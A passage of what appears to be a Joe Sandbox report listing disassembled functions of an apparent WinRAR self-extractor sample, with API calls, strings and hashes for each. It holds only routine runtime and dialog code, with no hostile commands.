                                        Function 00277CBA Relevance: .1, Instructions: 106COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1823258537.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                        • Associated: 00000000.00000002.1823242595.0000000000270000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823291718.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823309397.00000000002B9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823309397.00000000002C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823349371.00000000002C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_270000_yjOJ1YK5M3.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: df13c561cf512fd72e314f0c8c275dfb4e9792f9b659da3cf5682587dc4af2d2
                                        • Instruction ID: b85fab2017f921cf5bd23c69ade38c70a82bb7310584fcbc38332b9f67bb411b
                                        • Opcode Fuzzy Hash: df13c561cf512fd72e314f0c8c275dfb4e9792f9b659da3cf5682587dc4af2d2
                                        • Instruction Fuzzy Hash: 7D411930515B11CFC71ADF34D095AA6B7E4FF4A700B1288AFD06A8B261EB30EA04CF59
                                        Function 002992D0 Relevance: .1, Instructions: 76COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1823258537.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                        • Associated: 00000000.00000002.1823242595.0000000000270000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823291718.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823309397.00000000002B9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823309397.00000000002C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823349371.00000000002C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_270000_yjOJ1YK5M3.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                        • Instruction ID: d7e9a0ed08d6c7778e8772f70e5afee389ad98ffd1767f33e9ea525b2ec11a52
                                        • Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                        • Instruction Fuzzy Hash: 0A11087726418343DF148E2ED4B46BAA399EAC633076C43FED1524B6D8D222E9F59908
                                        Function 00283EAA Relevance: 28.2, APIs: 12, Strings: 4, Instructions: 240COMMON
                                        Download Yara Rule
                                        APIs
                                        • _swprintf.LIBCMT ref: 00283EEA
                                          • Part of subcall function 0027F6BA: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 0027F6CD
                                          • Part of subcall function 002889ED: WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000050,?,00000000,00000000,002BE088,?,00000007,002833E2,?,?,00000050,D946AC94), ref: 00288A0A
                                        • _strlen.LIBCMT ref: 00283F0B
                                        • SetDlgItemTextW.USER32(?,002B919C,?), ref: 00283F64
                                        • GetWindowRect.USER32(?,?), ref: 00283F9A
                                        • GetClientRect.USER32(?,?), ref: 00283FA6
                                        • GetWindowLongW.USER32(?,000000F0), ref: 00284051
                                        • GetWindowRect.USER32(?,?), ref: 00284081
                                        • SetWindowTextW.USER32(?,?), ref: 002840B0
                                        • GetSystemMetrics.USER32(00000008), ref: 002840B8
                                        • GetWindow.USER32(?,00000005), ref: 002840C3
                                        • GetWindowRect.USER32(00000000,?), ref: 002840F3
                                        • GetWindow.USER32(00000000,00000002), ref: 00284165
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1823258537.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                        • Associated: 00000000.00000002.1823242595.0000000000270000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823291718.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823309397.00000000002B9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823309397.00000000002C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823349371.00000000002C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_270000_yjOJ1YK5M3.jbxd
                                        Similarity
                                        • API ID: Window$Rect$Text$ByteCharClientItemLongMetricsMultiSystemWide__vswprintf_c_l_strlen_swprintf
                                        • String ID: $%s:$CAPTION$d$qI)
                                        • API String ID: 2407758923-2125137076
                                        • Opcode ID: 9978ffd7a5937302a5fefcfd11abce5522c180ab3879d746681a452171bfcd0b
                                        • Instruction ID: 1be54176db6741ab7d4f9f607ce558dec3872f5d8675bf874e907aae0144ba5a
                                        • Opcode Fuzzy Hash: 9978ffd7a5937302a5fefcfd11abce5522c180ab3879d746681a452171bfcd0b
                                        • Instruction Fuzzy Hash: 5781AE725193029FD714EF68CD89E6FBBE9EB89704F04091DFA8993290D770E904CB52
                                        Function 002961A7 Relevance: 21.1, APIs: 8, Strings: 4, Instructions: 58libraryloaderCOMMON
                                        Download Yara Rule
                                        APIs
                                        • InitializeCriticalSectionAndSpinCount.KERNEL32(002C60E0,00000FA0,?,?,00296185), ref: 002961B3
                                        • GetModuleHandleW.KERNEL32(api-ms-win-core-synch-l1-2-0.dll,?,?,00296185), ref: 002961BE
                                        • GetModuleHandleW.KERNEL32(kernel32.dll,?,?,00296185), ref: 002961CF
                                        • GetProcAddress.KERNEL32(00000000,SleepConditionVariableCS), ref: 002961E1
                                        • GetProcAddress.KERNEL32(00000000,WakeAllConditionVariable), ref: 002961EF
                                        • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,?,?,00296185), ref: 00296212
                                        • DeleteCriticalSection.KERNEL32(002C60E0,00000007,?,?,00296185), ref: 00296235
                                        • CloseHandle.KERNEL32(00000000,?,?,00296185), ref: 00296245
                                        Strings
                                        • api-ms-win-core-synch-l1-2-0.dll, xrefs: 002961B9
                                        • SleepConditionVariableCS, xrefs: 002961DB
                                        • kernel32.dll, xrefs: 002961CA
                                        • WakeAllConditionVariable, xrefs: 002961E7
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1823258537.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                        • Associated: 00000000.00000002.1823242595.0000000000270000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823291718.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823309397.00000000002B9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823309397.00000000002C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823349371.00000000002C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_270000_yjOJ1YK5M3.jbxd
                                        Similarity
                                        • API ID: Handle$AddressCriticalModuleProcSection$CloseCountCreateDeleteEventInitializeSpin
                                        • String ID: SleepConditionVariableCS$WakeAllConditionVariable$api-ms-win-core-synch-l1-2-0.dll$kernel32.dll
                                        • API String ID: 2565136772-3242537097
                                        • Opcode ID: 69abedb023755b4ba35fb4d9a7f1e8ace4d17a9c8459cb07df7d28fb17483345
                                        • Instruction ID: 2372c0d0450a667cf053a6caf0c1d4fd44e6a59819cd61802b9d1c3cd73fe578
                                        • Opcode Fuzzy Hash: 69abedb023755b4ba35fb4d9a7f1e8ace4d17a9c8459cb07df7d28fb17483345
                                        • Instruction Fuzzy Hash: D501D470A60312EFCF201FB1BC0DF163AA8FB47B517124511FC19E2250EE61C8218A71
                                        Function 002A37D2 Relevance: 19.6, APIs: 13, Instructions: 114COMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        • ___free_lconv_mon.LIBCMT ref: 002A3816
                                          • Part of subcall function 002A33B1: _free.LIBCMT ref: 002A33CE
                                          • Part of subcall function 002A33B1: _free.LIBCMT ref: 002A33E0
                                          • Part of subcall function 002A33B1: _free.LIBCMT ref: 002A33F2
                                          • Part of subcall function 002A33B1: _free.LIBCMT ref: 002A3404
                                          • Part of subcall function 002A33B1: _free.LIBCMT ref: 002A3416
                                          • Part of subcall function 002A33B1: _free.LIBCMT ref: 002A3428
                                          • Part of subcall function 002A33B1: _free.LIBCMT ref: 002A343A
                                          • Part of subcall function 002A33B1: _free.LIBCMT ref: 002A344C
                                          • Part of subcall function 002A33B1: _free.LIBCMT ref: 002A345E
                                          • Part of subcall function 002A33B1: _free.LIBCMT ref: 002A3470
                                          • Part of subcall function 002A33B1: _free.LIBCMT ref: 002A3482
                                          • Part of subcall function 002A33B1: _free.LIBCMT ref: 002A3494
                                          • Part of subcall function 002A33B1: _free.LIBCMT ref: 002A34A6
                                        • _free.LIBCMT ref: 002A380B
                                          • Part of subcall function 002A03D4: RtlFreeHeap.NTDLL(00000000,00000000,?,002A3546,?,00000000,?,00000000,?,002A356D,?,00000007,?,?,002A396A,?), ref: 002A03EA
                                          • Part of subcall function 002A03D4: GetLastError.KERNEL32(?,?,002A3546,?,00000000,?,00000000,?,002A356D,?,00000007,?,?,002A396A,?,?), ref: 002A03FC
                                        • _free.LIBCMT ref: 002A382D
                                        • _free.LIBCMT ref: 002A3842
                                        • _free.LIBCMT ref: 002A384D
                                        • _free.LIBCMT ref: 002A386F
                                        • _free.LIBCMT ref: 002A3882
                                        • _free.LIBCMT ref: 002A3890
                                        • _free.LIBCMT ref: 002A389B
                                        • _free.LIBCMT ref: 002A38D3
                                        • _free.LIBCMT ref: 002A38DA
                                        • _free.LIBCMT ref: 002A38F7
                                        • _free.LIBCMT ref: 002A390F
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1823258537.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                        • Associated: 00000000.00000002.1823242595.0000000000270000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823291718.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823309397.00000000002B9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823309397.00000000002C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823349371.00000000002C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_270000_yjOJ1YK5M3.jbxd
                                        Similarity
                                        • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                        • String ID:
                                        • API String ID: 161543041-0
                                        • Opcode ID: db24195b1d58858c1edbb83dea619ec6e1122eed13f25056b7f418b655e32a57
                                        • Instruction ID: 7a1236adc88e3a7fa3ebf274b6e4470d7f78eb80f2c0e8fc628caa3f9dd9de15
                                        • Opcode Fuzzy Hash: db24195b1d58858c1edbb83dea619ec6e1122eed13f25056b7f418b655e32a57
                                        • Instruction Fuzzy Hash: E6317031524306AFEF20EE39D885B5AB3E9EF02310F15486AF458D7151DE79EE64CB10
                                        Function 0028D912 Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 157memoryCOMMON
                                        Download Yara Rule
                                        APIs
                                        • __EH_prolog3_GS.LIBCMT ref: 0028D919
                                          • Part of subcall function 002714A7: _wcslen.LIBCMT ref: 002714B8
                                        • _wcslen.LIBCMT ref: 0028D97B
                                        • _wcslen.LIBCMT ref: 0028D99A
                                        • _wcslen.LIBCMT ref: 0028D9B6
                                        • _strlen.LIBCMT ref: 0028DA14
                                        • GlobalAlloc.KERNEL32(00000040,?,00000000,002AD9F0,00000000,?,00000000,?,<html>,00000006,<html><head><meta http-equiv="content-type" content="text/html; charset=utf-8"></head>,?), ref: 0028DA2D
                                        • CreateStreamOnHGlobal.COMBASE(00000000,00000001,00000000), ref: 0028DA54
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1823258537.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                        • Associated: 00000000.00000002.1823242595.0000000000270000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823291718.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823309397.00000000002B9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823309397.00000000002C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823349371.00000000002C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_270000_yjOJ1YK5M3.jbxd
                                        Similarity
                                        • API ID: _wcslen$Global$AllocCreateH_prolog3_Stream_strlen
                                        • String ID: </html>$<html>$<html><head><meta http-equiv="content-type" content="text/html; charset=utf-8"></head>$<style>body{font-family:"Arial";font-size:12;}</style>
                                        • API String ID: 1185167184-1533471033
                                        • Opcode ID: ae84d3ad529840beaa559cfb18d845d630fe87f9abbb6990af6c1c31de23a251
                                        • Instruction ID: 918898fc1313f084bae4ea6409fe9d35bc3e5d64fa4e05af9002a75dab1b077c
                                        • Opcode Fuzzy Hash: ae84d3ad529840beaa559cfb18d845d630fe87f9abbb6990af6c1c31de23a251
                                        • Instruction Fuzzy Hash: 7A514E75D21219AFEB04EBA0CC46BEEBBB9EF05310F140019E505AB1C1DB705E69CBA5
                                        Function 00293796 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 85windowCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetWindow.USER32(?,00000005), ref: 002937C4
                                        • GetClassNameW.USER32(00000000,?,00000080), ref: 002937F0
                                          • Part of subcall function 00288DA4: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,000000FF,00280E3F,?,?,?,00000046,00281ECE,00000046,?,exe,00000046), ref: 00288DBA
                                        • GetWindowLongW.USER32(00000000,000000F0), ref: 0029380C
                                        • SendMessageW.USER32(00000000,00000173,00000000,00000000), ref: 00293823
                                        • GetObjectW.GDI32(00000000,00000018,?), ref: 00293837
                                        • SendMessageW.USER32(00000000,00000172,00000000,00000000), ref: 00293860
                                        • DeleteObject.GDI32(00000000), ref: 00293867
                                        • GetWindow.USER32(00000000,00000002), ref: 00293870
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1823258537.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                        • Associated: 00000000.00000002.1823242595.0000000000270000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823291718.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823309397.00000000002B9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823309397.00000000002C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823349371.00000000002C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_270000_yjOJ1YK5M3.jbxd
                                        Similarity
                                        • API ID: Window$MessageObjectSend$ClassCompareDeleteLongNameString
                                        • String ID: Pl)uDK)$STATIC
                                        • API String ID: 3820355801-3216236245
                                        • Opcode ID: 976869f067bed7dc4b33de9e5312745b137cd43339c1f0e57d2d7802c10585e1
                                        • Instruction ID: afcd0e01dc44012fdb44f8d096be631704dd4942e7247bee03f2d13d6b635927
                                        • Opcode Fuzzy Hash: 976869f067bed7dc4b33de9e5312745b137cd43339c1f0e57d2d7802c10585e1
                                        • Instruction Fuzzy Hash: 742134721553117BEA20AF24AC4AFEF73ACBF45700F010024FA15A60D1DB708A154BA5
                                        Function 0029FF11 Relevance: 15.1, APIs: 10, Instructions: 54COMMON
                                        Download Yara Rule
                                        APIs
                                        • _free.LIBCMT ref: 0029FF25
                                          • Part of subcall function 002A03D4: RtlFreeHeap.NTDLL(00000000,00000000,?,002A3546,?,00000000,?,00000000,?,002A356D,?,00000007,?,?,002A396A,?), ref: 002A03EA
                                          • Part of subcall function 002A03D4: GetLastError.KERNEL32(?,?,002A3546,?,00000000,?,00000000,?,002A356D,?,00000007,?,?,002A396A,?,?), ref: 002A03FC
                                        • _free.LIBCMT ref: 0029FF31
                                        • _free.LIBCMT ref: 0029FF3C
                                        • _free.LIBCMT ref: 0029FF47
                                        • _free.LIBCMT ref: 0029FF52
                                        • _free.LIBCMT ref: 0029FF5D
                                        • _free.LIBCMT ref: 0029FF68
                                        • _free.LIBCMT ref: 0029FF73
                                        • _free.LIBCMT ref: 0029FF7E
                                        • _free.LIBCMT ref: 0029FF8C
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1823258537.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                        • Associated: 00000000.00000002.1823242595.0000000000270000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823291718.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823309397.00000000002B9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823309397.00000000002C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823349371.00000000002C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_270000_yjOJ1YK5M3.jbxd
                                        Similarity
                                        • API ID: _free$ErrorFreeHeapLast
                                        • String ID:
                                        • API String ID: 776569668-0
                                        • Opcode ID: 3bb4e09757117a3348387c487007ff8a8417a6e2c1d36bfc3a8f0d5c73024e87
                                        • Instruction ID: ab708fd698aa0a4ca1713a88262efbf0a717c5bbf6b74ab110219207f5176c9d
                                        • Opcode Fuzzy Hash: 3bb4e09757117a3348387c487007ff8a8417a6e2c1d36bfc3a8f0d5c73024e87
                                        • Instruction Fuzzy Hash: 1C11B37612424CBFCF41EF94C982CDD3BA9EF09350B1144A1BA089F222DA75EE60DF80
                                        Function 00299AB1 Relevance: 14.3, APIs: 5, Strings: 3, Instructions: 303COMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1823258537.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                        • Associated: 00000000.00000002.1823242595.0000000000270000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823291718.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823309397.00000000002B9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823309397.00000000002C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823349371.00000000002C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_270000_yjOJ1YK5M3.jbxd
                                        Similarity
                                        • API ID: CallFramesMatchNestedTypeUnexpectedUnwind_aborttype_info::operator==
                                        • String ID: csm$csm$csm
                                        • API String ID: 322700389-393685449
                                        • Opcode ID: 38d4b5b9b9891d0caea89a72cb63d3aff87e5337d0bb61431f7e946274cdc697
                                        • Instruction ID: 22e69350dee76452fefe5c2250167e5f12b1e1d0ca14b9f20c53e585b4b878d8
                                        • Opcode Fuzzy Hash: 38d4b5b9b9891d0caea89a72cb63d3aff87e5337d0bb61431f7e946274cdc697
                                        • Instruction Fuzzy Hash: 81B16E7582020ADFCF15EFA8D9819AEB7B5FF04324F14445EE8056B212D735DAA1CFA2
                                        Function 0027D990 Relevance: 14.3, APIs: 7, Strings: 1, Instructions: 268fileCOMMON
                                        Download Yara Rule
                                        APIs
                                        • __EH_prolog3_GS.LIBCMT ref: 0027D99A
                                        • GetLongPathNameW.KERNEL32(?,00000000,00000000), ref: 0027D9BF
                                        • GetLongPathNameW.KERNEL32(?,?,?), ref: 0027DA11
                                        • GetShortPathNameW.KERNEL32(?,00000000,00000000), ref: 0027DA34
                                        • GetShortPathNameW.KERNEL32(?,?,?), ref: 0027DA84
                                        • MoveFileW.KERNEL32(-00000040,-00000028), ref: 0027DC9F
                                        • MoveFileW.KERNEL32(-00000028,-00000040), ref: 0027DCEC
                                          • Part of subcall function 002714A7: _wcslen.LIBCMT ref: 002714B8
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1823258537.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                        • Associated: 00000000.00000002.1823242595.0000000000270000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823291718.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823309397.00000000002B9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823309397.00000000002C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823349371.00000000002C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_270000_yjOJ1YK5M3.jbxd
                                        Similarity
                                        • API ID: NamePath$FileLongMoveShort$H_prolog3__wcslen
                                        • String ID: rtmp
                                        • API String ID: 2388273531-870060881
                                        • Opcode ID: fd5e62e1e06c654355a21dfa0fc17b71e3cbe87fbf448fbdd438608e4988fe23
                                        • Instruction ID: 869050aedd0140228300cec72a345b8176a6579edec0ba105aa8d8609ea2272a
                                        • Opcode Fuzzy Hash: fd5e62e1e06c654355a21dfa0fc17b71e3cbe87fbf448fbdd438608e4988fe23
                                        • Instruction Fuzzy Hash: 3CB13671921218DACF21EFA4CC89BDDBBB9BF15305F548099E40DA7251DB309BA9CF60
                                        Function 00281E54 Relevance: 14.2, APIs: 4, Strings: 4, Instructions: 215COMMON
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1823258537.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                        • Associated: 00000000.00000002.1823242595.0000000000270000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823291718.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823309397.00000000002B9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823309397.00000000002C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823349371.00000000002C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_270000_yjOJ1YK5M3.jbxd
                                        Similarity
                                        • API ID: H_prolog3__wcslen
                                        • String ID: .rar$exe$rar$sfx
                                        • API String ID: 3251556500-630704357
                                        • Opcode ID: 48f0668986f82ae2d0f06cda1bc50b747b43cbcda8c62428219c60b83f5a2016
                                        • Instruction ID: a1d588bf96b6eebfb11bcd6ebad35d23202d4c10b8166cec47151e5f79f11ba0
                                        • Opcode Fuzzy Hash: 48f0668986f82ae2d0f06cda1bc50b747b43cbcda8c62428219c60b83f5a2016
                                        • Instruction Fuzzy Hash: 47711538A22714DBCB21FFA8C941AADB3F8BF58710F20451AF4819B6D1DB715976CB50
                                        Function 002906D0 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 95windowCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 00271E44: GetDlgItem.USER32(00000000,00003021), ref: 00271E88
                                          • Part of subcall function 00271E44: SetWindowTextW.USER32(00000000,002AC6C8), ref: 00271E9E
                                        • EndDialog.USER32(?,00000001), ref: 00290720
                                        • SendMessageW.USER32(?,00000080,00000001,0001041B), ref: 00290747
                                        • SendDlgItemMessageW.USER32(?,00000066,00000172,00000000,00050D57), ref: 00290760
                                        • GetDlgItem.USER32(?,00000065), ref: 0029077C
                                        • SendMessageW.USER32(00000000,00000435,00000000,00010000), ref: 00290790
                                        • SendMessageW.USER32(00000000,00000443,00000000,00000000), ref: 002907A6
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1823258537.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                        • Associated: 00000000.00000002.1823242595.0000000000270000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823291718.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823309397.00000000002B9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823309397.00000000002C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823349371.00000000002C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_270000_yjOJ1YK5M3.jbxd
                                        Similarity
                                        • API ID: MessageSend$Item$DialogTextWindow
                                        • String ID: LICENSEDLG$J)
                                        • API String ID: 3077722735-2388866260
                                        • Opcode ID: a29c80fe38aa40797082c04302337e69e02d0abc1b3700184a125e8168b8b58c
                                        • Instruction ID: 21c24a20b7e67d4fe2818af4586ffd79ada4975a3607db7f2d936fb940504839
                                        • Opcode Fuzzy Hash: a29c80fe38aa40797082c04302337e69e02d0abc1b3700184a125e8168b8b58c
                                        • Instruction Fuzzy Hash: BB21F431264209BFDA106FA5ED8DFEB7B6DEF46795F010104F604A6090C7A1B9618F31
                                        Function 002953D0 Relevance: 13.7, APIs: 9, Instructions: 154memoryCOMMON
                                        Download Yara Rule
                                        APIs
                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,002804AB,002804AD,00000000,00000000,D946AC94,00000001,00000000,00000000,?,0028038C,?,00000004,002804AB,ROOT\CIMV2), ref: 00295459
                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,002804AB,?,00000000,00000000,?,?,0028038C,?,00000004,002804AB), ref: 002954D4
                                        • SysAllocString.OLEAUT32(00000000), ref: 002954DF
                                        • _com_issue_error.COMSUPP ref: 00295508
                                        • _com_issue_error.COMSUPP ref: 00295512
                                        • GetLastError.KERNEL32(80070057,D946AC94,00000001,00000000,00000000,?,0028038C,?,00000004,002804AB,ROOT\CIMV2), ref: 00295517
                                        • _com_issue_error.COMSUPP ref: 0029552A
                                        • GetLastError.KERNEL32(00000000,?,0028038C,?,00000004,002804AB,ROOT\CIMV2), ref: 00295540
                                        • _com_issue_error.COMSUPP ref: 00295553
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1823258537.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                        • Associated: 00000000.00000002.1823242595.0000000000270000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823291718.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823309397.00000000002B9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823309397.00000000002C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823349371.00000000002C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_270000_yjOJ1YK5M3.jbxd
                                        Similarity
                                        • API ID: _com_issue_error$ByteCharErrorLastMultiWide$AllocString
                                        • String ID:
                                        • API String ID: 1353541977-0
                                        • Opcode ID: 70f52c3837bfec40db2a8050b40cd9a2e6a05df8608a7df1f84b220a93d107d8
                                        • Instruction ID: 05714e15c500a4dc45b2d35104ca7be5739d1716bd1753ab20f379d968ce5164
                                        • Opcode Fuzzy Hash: 70f52c3837bfec40db2a8050b40cd9a2e6a05df8608a7df1f84b220a93d107d8
                                        • Instruction Fuzzy Hash: B7413B71B20625ABCF11DF68DC45BAEBBE8EF44710F504229F909E7241DB35D850CBA4
                                        Function 00280469 Relevance: 12.4, APIs: 2, Strings: 5, Instructions: 197COMMON
                                        Download Yara Rule
                                        APIs
                                        • __EH_prolog3.LIBCMT ref: 00280470
                                          • Part of subcall function 00280360: __EH_prolog3.LIBCMT ref: 00280367
                                        • VariantClear.OLEAUT32(?), ref: 002805FA
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1823258537.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                        • Associated: 00000000.00000002.1823242595.0000000000270000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823291718.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823309397.00000000002B9000.00000004.00000001.01000000.00000003.sdmpDownload File
